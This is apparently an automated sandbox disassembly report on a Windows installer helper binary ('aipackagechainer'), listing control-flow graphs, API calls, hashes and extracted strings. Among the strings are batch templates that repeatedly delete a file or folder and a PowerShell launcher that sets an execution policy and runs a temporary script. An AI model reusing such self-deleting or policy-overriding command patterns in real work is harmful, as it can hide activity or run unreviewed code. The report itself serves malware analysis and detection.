                                          control_flow_graph 1516 92da0-92dd1 1517 92dfb-92e0a GetShortPathNameW 1516->1517 1518 92dd3-92de0 call 6c880 call 65290 1516->1518 1520 92e0c-92e15 call 638d0 1517->1520 1521 92de7-92df8 1517->1521 1518->1521 1527 92e1b-92e2f 1520->1527 1528 92f62-92f6f call 63590 1520->1528 1532 92f58-92f5d call 63590 1527->1532 1533 92e35-92e47 1527->1533 1532->1528 1534 92e49-92e52 call 65440 1533->1534 1535 92e55-92e58 1533->1535 1534->1535 1535->1532 1538 92e5e-92e76 GetShortPathNameW 1535->1538 1540 92e7c-92e8f call d1e17 1538->1540 1541 92f1e-92f36 1538->1541 1540->1532 1546 92e95-92e9b 1540->1546 1541->1521 1542 92f3c-92f55 1541->1542 1546->1532 1547 92ea1-92eb2 1546->1547 1548 92f0c-92f0e call 6c880 1547->1548 1549 92eb4-92ec9 WideCharToMultiByte 1547->1549 1552 92f13-92f19 call 661c0 1548->1552 1549->1548 1551 92ecb-92edc 1549->1551 1553 92ede-92ee1 call 6c920 1551->1553 1554 92ee6-92eff WideCharToMultiByte 1551->1554 1552->1541 1553->1554 1554->1532 1556 92f01-92f0a 1554->1556 1556->1552
                                          APIs
                                          • GetShortPathNameW.KERNEL32(00095103,00000000,00000000), ref: 00092E00
                                          • GetShortPathNameW.KERNEL32(?,?,00000000), ref: 00092E6E
                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 00092EBE
                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,00000000,00000000), ref: 00092EF4
                                          Strings
                                          • open, xrefs: 000931B0
                                          • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00093367
                                          • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00093347, 0009334F
                                          • \\?\, xrefs: 000937D5
                                          • runas, xrefs: 000931F7
                                          • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00093342
                                          • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00093360, 0009336F
                                          • p1Wu, xrefs: 0009387B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiNamePathShortWide
                                          • String ID: @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$\\?\$open$p1Wu$runas
                                          • API String ID: 3379522384-3207207415
                                          • Opcode ID: a85950702d86503253a249ce51ad253034665db92d06fca1b0da5760a8c59a30
                                          • Instruction ID: 9677270e9e8e9fb20c99201c2182aee2671974d25329278b4e5fda5f4200c718
                                          • Opcode Fuzzy Hash: a85950702d86503253a249ce51ad253034665db92d06fca1b0da5760a8c59a30
                                          • Instruction Fuzzy Hash: F5519A71600645AFEB14DF68CC49FAEF7B6EF84720F10866DF5259B291DB71A840CBA0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1558 97540-97582 1559 9758b-975e2 call 97930 call 97b10 call 64300 call 668a0 1558->1559 1560 97584-97586 1558->1560 1572 975e4 1559->1572 1573 975e6-975ef call 638d0 1559->1573 1562 978f6-97918 call cc491 1560->1562 1572->1573 1576 97919-97923 call 63590 1573->1576 1577 975f5-97606 1573->1577 1581 97608-9760e 1577->1581 1582 97634 1577->1582 1584 9761e-97620 1581->1584 1585 97610-9761c call 651e0 1581->1585 1583 97636-9763b call 654b0 1582->1583 1589 97640-97667 call 64260 * 2 call 84130 call 638d0 1583->1589 1588 97623-9762c 1584->1588 1585->1589 1588->1588 1591 9762e-97632 1588->1591 1589->1576 1600 9766d-97697 GetTempFileNameW 1589->1600 1591->1583 1602 9769d-976a0 1600->1602 1603 97765-9776c call 638d0 1600->1603 1604 976a3-976ac 1602->1604 1603->1576 1609 97772-977a4 call 78c30 call 638d0 1603->1609 1604->1604 1606 976ae-976bf call 654b0 1604->1606 1613 976c8-976cf call 638d0 1606->1613 1609->1576 1620 977aa-977e6 call 78c30 CopyFileW 1609->1620 1613->1576 1619 976d5-976f3 1613->1619 1623 97700-97707 call 654b0 1619->1623 1624 976f5-976fe call 651e0 1619->1624 1632 977e8-97831 call 842c0 call 97410 call a9360 1620->1632 1633 9785b 1620->1633 1628 9770c-97724 call cdd6b 1623->1628 1624->1628 1637 9774a-9775b 1628->1637 1638 97726-9772d 1628->1638 1659 9783b-9784f 1632->1659 1660 97833-97836 1632->1660 1635 9785d-97871 1633->1635 1639 9787b-9788f 1635->1639 1640 97873-97876 1635->1640 1637->1603 1643 9775d-97760 1637->1643 1638->1637 1642 9772f-97745 call 7cd90 call 64f00 1638->1642 1644 97899-978ad 1639->1644 1645 97891-97894 1639->1645 1640->1639 1642->1637 1643->1603 1649 978af-978b2 1644->1649 1650 978b7-978cb 1644->1650 1645->1644 1649->1650 1651 978cd-978d0 1650->1651 1652 978d5-978ea 1650->1652 1651->1652 1656 978ec-978ef 1652->1656 1657 978f4 1652->1657 1656->1657 1657->1562 1659->1635 1661 97851-97859 1659->1661 1660->1659 1661->1635
                                          APIs
                                          • GetTempFileNameW.KERNELBASE(?,AI_,00000000,?,?,?,?,?,?,?,?,?,?,?,000F5F95,000000FF), ref: 0009768C
                                          • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,000F5F95,000000FF), ref: 000976C2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: File$DeleteNameTemp
                                          • String ID: %s -paths %s -retry_count %d$-NoProfile -NonInteractive -NoLogo -ExecutionPolicy %s -Command "%s"$.ps1$AI_$RemoteSigned$p1Wu
                                          • API String ID: 1648863064-4249908782
                                          • Opcode ID: c549d67bfe593caf027fdc55a716ef5c15c6df313f7c4a39688900654a7cac25
                                          • Instruction ID: 9cbcc573ca288a466aea23c51a12789d1c3c1398a207bbfedf76f97cecf677e7
                                          • Opcode Fuzzy Hash: c549d67bfe593caf027fdc55a716ef5c15c6df313f7c4a39688900654a7cac25
                                          • Instruction Fuzzy Hash: 47D1B431904649DFDF10DFA8CC49BEEB7B5EF45314F188298E4099B292EB749E05DBA0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1684 97120-97151 1685 972bd-972ce 1684->1685 1686 97157-97171 GetActiveWindow 1684->1686 1687 9717f-97187 1686->1687 1688 97173-97175 call 98500 1686->1688 1689 97189-97193 call ca3da 1687->1689 1690 971a2-971b1 call ca4dc 1687->1690 1692 9717a KiUserCallbackDispatcher 1688->1692 1689->1690 1697 97195-9719d SetLastError 1689->1697 1698 972d1-97335 call 7df00 call 97540 1690->1698 1699 971b7-9721c GetCurrentThreadId EnterCriticalSection LeaveCriticalSection CreateDialogParamW 1690->1699 1692->1687 1700 97222-97239 GetCurrentThreadId 1697->1700 1712 9733f-9735c call 7ce70 1698->1712 1713 97337-9733a 1698->1713 1699->1700 1704 9723b-97242 1700->1704 1705 9729a-972bb SetWindowTextW GetDlgItem SetWindowTextW 1700->1705 1707 97255-97290 call 87ab0 call 78c30 1704->1707 1708 97244-97250 call 661c0 call 8d3a0 1704->1708 1705->1685 1707->1705 1721 97292-97295 1707->1721 1708->1707 1713->1712 1721->1705
                                          APIs
                                          • GetActiveWindow.USER32 ref: 0009715A
                                          • SetLastError.KERNEL32(0000000E), ref: 00097197
                                          • GetCurrentThreadId.KERNEL32 ref: 00097222
                                          • SetWindowTextW.USER32(?,00000000), ref: 000972A5
                                          • GetDlgItem.USER32(?,000003E9), ref: 000972AF
                                          • SetWindowTextW.USER32(00000000,?), ref: 000972BB
                                            • Part of subcall function 00098500: GetDlgItem.USER32(?,00000002), ref: 00098520
                                            • Part of subcall function 00098500: GetWindowRect.USER32(00000000,?), ref: 00098536
                                            • Part of subcall function 00098500: ShowWindow.USER32(00000000,00000000,?,?,?,?,0009717A), ref: 0009854F
                                            • Part of subcall function 00098500: InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,0009717A), ref: 0009855A
                                            • Part of subcall function 00098500: GetDlgItem.USER32(00000000,000003E9), ref: 0009856C
                                            • Part of subcall function 00098500: GetWindowRect.USER32(00000000,?), ref: 00098582
                                            • Part of subcall function 00098500: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,0009717A), ref: 000985C5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$ItemRect$Text$ActiveCurrentErrorInvalidateLastShowThread
                                          • String ID:
                                          • API String ID: 2012338523-0
                                          • Opcode ID: e76368a95405bb757aea63e8dd7481743171b8c0445031f0d73685c806c39d0a
                                          • Instruction ID: 2bf20a7691fa8366355dd1b56078638684dec826349ad58aa03b028e7be36c9e
                                          • Opcode Fuzzy Hash: e76368a95405bb757aea63e8dd7481743171b8c0445031f0d73685c806c39d0a
                                          • Instruction Fuzzy Hash: 5E61F031904649EFEB10DF68CC48B9ABBF4FF05720F108669F51897AE1DB74A904DB91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1722 8d3a0-8d3f0 call 65f70 1725 8d400-8d412 GetFileVersionInfoSizeW 1722->1725 1726 8d3f2-8d3fd call 65340 1722->1726 1728 8d418-8d423 call 82920 1725->1728 1729 8d564 1725->1729 1726->1725 1737 8d42d-8d43a 1728->1737 1738 8d425-8d428 1728->1738 1732 8d566-8d57b 1729->1732 1734 8d57d-8d580 1732->1734 1735 8d585-8d5af call ccb60 1732->1735 1734->1735 1740 8d44a-8d45b GetFileVersionInfoW 1737->1740 1741 8d43c-8d447 call 65340 1737->1741 1738->1729 1740->1729 1743 8d461-8d46a call 638d0 1740->1743 1741->1740 1747 8d5b0-8d5ba call 63590 1743->1747 1748 8d470-8d495 VerQueryValueW 1743->1748 1752 8d4a9-8d4ae 1748->1752 1753 8d497-8d49b 1748->1753 1755 8d4b3-8d4d2 call 78c30 1752->1755 1753->1752 1754 8d49d-8d4a7 1753->1754 1754->1755 1758 8d4e2-8d4f4 VerQueryValueW 1755->1758 1759 8d4d4-8d4df call 65340 1755->1759 1761 8d549-8d55a 1758->1761 1762 8d4f6-8d4fa 1758->1762 1759->1758 1761->1729 1763 8d55c-8d55f 1761->1763 1762->1761 1765 8d4fc-8d501 1762->1765 1763->1729 1766 8d503-8d505 1765->1766 1767 8d507-8d50f 1765->1767 1769 8d520-8d53b call 654b0 1766->1769 1768 8d510-8d519 1767->1768 1768->1768 1770 8d51b-8d51e 1768->1770 1773 8d53d-8d540 1769->1773 1774 8d545-8d547 1769->1774 1770->1769 1773->1774 1774->1732
                                          APIs
                                          • GetFileVersionInfoSizeW.KERNELBASE(?,?,D11C52E5,?,?,00000000,000000FF,?,00097255), ref: 0008D405
                                          • GetFileVersionInfoW.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,000000FF,?,00097255), ref: 0008D453
                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,Ur,?,?,00000000,000000FF,?,00097255), ref: 0008D48D
                                          • VerQueryValueW.VERSION(?,?,00000000,000000FF,?,?,?,?,00000000,000000FF,?,00097255), ref: 0008D4EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: FileInfoQueryValueVersion$Size
                                          • String ID: ProductName$Ur$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                                          • API String ID: 2099394744-3639713084
                                          • Opcode ID: 1d24ce48f3cfd1cce8a4dc795a964135661cad24e93d6717478ebe0566d49e06
                                          • Instruction ID: 29d0857f392b07d64055eece046ba65c755f1aac87080556700dcadbd3bf2030
                                          • Opcode Fuzzy Hash: 1d24ce48f3cfd1cce8a4dc795a964135661cad24e93d6717478ebe0566d49e06
                                          • Instruction Fuzzy Hash: 7F61AE71901609DFDB10EFA8C849AAEB7F9FF15315F14826AE451A72D1EB34DE00CBA0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1784 ca16c-ca177 1785 ca179-ca185 DecodePointer 1784->1785 1786 ca186-ca19d LoadLibraryExA 1784->1786 1787 ca19f-ca1b4 call ca21c 1786->1787 1788 ca217 1786->1788 1787->1788 1792 ca1b6-ca1cb call ca21c 1787->1792 1789 ca219-ca21b 1788->1789 1792->1788 1795 ca1cd-ca1e2 call ca21c 1792->1795 1795->1788 1798 ca1e4-ca1f9 call ca21c 1795->1798 1798->1788 1801 ca1fb-ca215 DecodePointer 1798->1801 1801->1789
                                          APIs
                                          • DecodePointer.KERNEL32(?,?,?,000CA4B2,0012884C,?,?,?,000A86AB,?,?,00000000,D11C52E5), ref: 000CA17E
                                          • LoadLibraryExA.KERNELBASE(atlthunk.dll,00000000,00000800,?,?,?,000CA4B2,0012884C,?,?,?,000A86AB,?,?,00000000,D11C52E5), ref: 000CA193
                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,D11C52E5), ref: 000CA20F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: DecodePointer$LibraryLoad
                                          • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                          • API String ID: 1423960858-1745123996
                                          • Opcode ID: 1b25726787ab7e990b95484491c4849ce21c77b24abfbdd48293abfa3a2aefac
                                          • Instruction ID: 0e591a970d7d3df4963a1b584b557aac960081b63ad9f35492583bcbd0c6f9a8
                                          • Opcode Fuzzy Hash: 1b25726787ab7e990b95484491c4849ce21c77b24abfbdd48293abfa3a2aefac
                                          • Instruction Fuzzy Hash: 3201E1317812AC36CA516718EC02FAD3B849B13748F040068FF80BA5A3DBA68D299597
                                          APIs
                                          • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,000F250D,00000000,00000000,?), ref: 00085ABB
                                          • GetLastError.KERNEL32 ref: 00085ACC
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00085AE2
                                          • GetExitCodeProcess.KERNELBASE(?,00000000), ref: 00085AF3
                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00085AFD
                                          • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00085B18
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ProcessWow64$ChangeCloseCodeCreateErrorExitFindLastNotificationObjectRedirectionRevertSingleWait
                                          • String ID: D
                                          • API String ID: 799163817-2746444292
                                          • Opcode ID: 827568670870385fafa5cfb79e8fd109a79a958f975036822959969f7d4e6833
                                          • Instruction ID: d04d07e3bc907720bc0fcdf499ffba5ace772de1126846b61c5fb2c612849779
                                          • Opcode Fuzzy Hash: 827568670870385fafa5cfb79e8fd109a79a958f975036822959969f7d4e6833
                                          • Instruction Fuzzy Hash: 59316D31E00789ABDB10CFA4CD44BAEBBF9FF59310F145219E410A6290DB749980CB51
                                          APIs
                                          • GetDlgItem.USER32(?,00000002), ref: 00098520
                                          • GetWindowRect.USER32(00000000,?), ref: 00098536
                                          • ShowWindow.USER32(00000000,00000000,?,?,?,?,0009717A), ref: 0009854F
                                          • InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,0009717A), ref: 0009855A
                                          • GetDlgItem.USER32(00000000,000003E9), ref: 0009856C
                                          • GetWindowRect.USER32(00000000,?), ref: 00098582
                                          • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,0009717A), ref: 000985C5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$Rect$Item$InvalidateShow
                                          • String ID:
                                          • API String ID: 2147159307-0
                                          • Opcode ID: 4a524f263339af8342faf25c6b6d422d8f00d6185532b5cb59e408bcbf693af3
                                          • Instruction ID: bdfa6b48385001a793a2381c4188439be6e3ff5a0a304359a54455b61b7afdb4
                                          • Opcode Fuzzy Hash: 4a524f263339af8342faf25c6b6d422d8f00d6185532b5cb59e408bcbf693af3
                                          • Instruction Fuzzy Hash: AA212871604340AFE300DF24DC49A6B7BE9EF8D710F048658F859D72A1E730D985CB56
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0007DB2B
                                          • DefWindowProcW.USER32(00000000,00000000,00000000,00000000,?,?,?,?,?,000F126D,000000FF), ref: 0007DB46
                                            • Part of subcall function 0007DDA0: GetCurrentThreadId.KERNEL32 ref: 0007DDFD
                                            • Part of subcall function 0007A1F0: FindFirstFileW.KERNELBASE(?,00000000,.ini,00000004,?,?,?,00000000,00000000,?,D11C52E5), ref: 0007A321
                                          • EnterCriticalSection.KERNEL32(00129AB0,?,000F126D,000000FF), ref: 0007DB8C
                                          • DestroyWindow.USER32(00000000,?,000F126D,000000FF), ref: 0007DBAA
                                          • LeaveCriticalSection.KERNEL32(00129AB0,?,000F126D,000000FF), ref: 0007DBF3
                                          • CoUninitialize.OLE32(?,000F126D,000000FF), ref: 0007DCC1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalSectionWindow$CurrentDestroyEnterFileFindFirstInitializeLeaveProcThreadUninitialize
                                          • String ID:
                                          • API String ID: 142156328-0
                                          • Opcode ID: 509931748a8f83687ccffe1b56243c606e6162f42c6fa083aebe36dc58196ac2
                                          • Instruction ID: 49ce33798c305a006f7c6dff67dd2b7c7070d5eb31bf120d12a86a4a25f0c363
                                          • Opcode Fuzzy Hash: 509931748a8f83687ccffe1b56243c606e6162f42c6fa083aebe36dc58196ac2
                                          • Instruction Fuzzy Hash: 2251B071A01344AFEB30DF68D845BAAB7F4BF00700F14841DE849AB6D1D7B8A944CB96
                                          APIs
                                          • EndDialog.USER32 ref: 0009FF3D
                                            • Part of subcall function 000A7B30: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 000A7B74
                                            • Part of subcall function 000A7B30: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000A7B7F
                                            • Part of subcall function 00098930: GetWindowLongW.USER32(?,000000F0), ref: 00098977
                                            • Part of subcall function 00098930: GetParent.USER32(00000000), ref: 0009898A
                                            • Part of subcall function 00098930: GetWindowRect.USER32(?,?), ref: 000989AB
                                            • Part of subcall function 00098930: GetWindowLongW.USER32(00000000,000000F0), ref: 000989BE
                                            • Part of subcall function 00098930: MonitorFromWindow.USER32(?,00000002), ref: 000989D6
                                            • Part of subcall function 00098930: GetMonitorInfoW.USER32(00000000,?), ref: 000989EC
                                          • SetWindowTextW.USER32(?,?), ref: 0009FE6E
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                            • Part of subcall function 000651E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00092CA5,-00000010,?,?,?,D11C52E5,?,00000000,?,00000000), ref: 00065203
                                          • GetDlgItem.USER32(00000001,0000040A), ref: 0009FEAA
                                          • SetWindowTextW.USER32(00000000,00000000), ref: 0009FEB5
                                            • Part of subcall function 000AECD0: GetWindowLongW.USER32(?,000000F0), ref: 000AECF5
                                            • Part of subcall function 000AECD0: GetParent.USER32(?), ref: 000AECFF
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00040280,?,00000000,?), ref: 0009FED9
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Window$Long$MessageMonitorParentSendText$CreateDialogFindFromHeapInfoItemProcessRectResourceThread
                                          • String ID:
                                          • API String ID: 758803202-0
                                          • Opcode ID: f017974b1eeb443e89d5d8ec192041564f02cfc28fc3dd4d1bc8ffeaaf15bb56
                                          • Instruction ID: ab6b925008751b5458e482908024d339ac4f41bec48b3079eb79a07b94fe0c1a
                                          • Opcode Fuzzy Hash: f017974b1eeb443e89d5d8ec192041564f02cfc28fc3dd4d1bc8ffeaaf15bb56
                                          • Instruction Fuzzy Hash: 9B51F17260460AAFE710DF58DC45BA9B7E4FF05320F00823AF915C7A91DB76A960CB90
                                          APIs
                                          • MsgWaitForMultipleObjectsEx.USER32(00000001,?,000000FF,000005FF,00000004), ref: 00085991
                                          • PeekMessageW.USER32(?,00000000), ref: 000859D7
                                          • TranslateMessage.USER32(?), ref: 000859E2
                                          • DispatchMessageW.USER32(?), ref: 000859E9
                                          • MsgWaitForMultipleObjectsEx.USER32(00000001,?,000000FF,000005FF,00000004), ref: 000859FB
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
                                          • String ID:
                                          • API String ID: 4084795276-0
                                          • Opcode ID: 7c04da2c3f67b25bbaeabd8deffbb35383977f441838efd2063da68b2fbe3c70
                                          • Instruction ID: 605007622ea746d5f01d9908e006dfde9598214f52ea0b0ecbc62d5049621910
                                          • Opcode Fuzzy Hash: 7c04da2c3f67b25bbaeabd8deffbb35383977f441838efd2063da68b2fbe3c70
                                          • Instruction Fuzzy Hash: 88113631640309AAF210DB51DC81FAA73DCEB88770F500626FA50A31C0D664E9448B22
                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,D11C52E5,00000000,000F5E8E,000000FF), ref: 00097463
                                          • PathAppendW.SHLWAPI(00000000,WindowsPowerShell\v1.0\powershell.exe), ref: 0009747A
                                          • PathFileExistsW.KERNELBASE(00000000), ref: 00097488
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                            • Part of subcall function 000651E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00092CA5,-00000010,?,?,?,D11C52E5,?,00000000,?,00000000), ref: 00065203
                                          Strings
                                          • WindowsPowerShell\v1.0\powershell.exe, xrefs: 00097471
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
